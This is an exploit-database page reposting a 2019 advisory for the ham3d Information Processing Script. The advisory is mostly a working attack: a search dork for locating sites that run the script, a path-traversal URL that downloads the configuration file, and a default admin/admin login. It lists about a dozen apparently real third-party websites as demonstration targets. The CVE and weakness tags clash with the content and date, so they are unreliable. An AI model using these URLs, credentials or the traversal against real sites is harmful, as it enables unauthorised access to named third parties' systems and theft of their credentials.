Advertisement






ham3d Information Processing Script Local File Download & Default Password Vulnerability

CVE Category Price Severity
CVE-2021-44766 CWE-78 Not specified High
Author Risk Exploitation Type Date
Ham3d High Local 2019-10-29
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019100179

Below is a copy:

ham3d Information Processing Script Local File Download & Default Password Vulnerability
/***********************************************************************************
** Exploit Title:  ham3d Information Processing Script Local File Download & Default Password Vulnerability
**
** Exploit Author:  Milad Hacking
**
** Vendor Homepage : http://www.ham3d.net/
**
** Demo Script Link: http://wensoni.com
**
** Version : 1.1
**
** Google Dork : inurl:fa/forgotpass.html
**
** Date: 2019-10-25
**
** Tested on:  Kali Linux  /  lceweasel
**
***********************************************************************************
** Demo :

http://123cookie.ir/ajax.php?download=../include/config.php

http://1q1.ir/ajax.php?download=../include/config.php

http://emitice.ir/ajax.php?download=../include/config.php

http://wensoni.com/ajax.php?download=../include/config.php

http://tiamnetworks.ir/ajax.php?download=../include/config.php

http://assc.ir/ajax.php?download=../include/config.php

User * Password With Login  : admin

http://www.5040.ir/report/admin/

http://www.shoaco.com/admin951shoaco/index.php?login

http://quran.kish.ir/admin159357kishetrat2486/?login

http://setareganzamin.com/ADMIN123654789SETAREGANEZAMIN/index.php?login

http://assc.ir/admin/?forgot_password#?login

***********************************************************************************
** Special thanks to:  iliya Norton - Milad Hacking - N3TC4T - Nazila Blackhat - Mahsa Black - Azinista
Mahdi Cocain - Vahid Elmi 
Long Love Ashiyane <3
***********************************************************************************
https://tlgm.me/Milad_Hacking
http://instagram.com/Milad.Hacking
[email protected]

***********************************************************************************

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum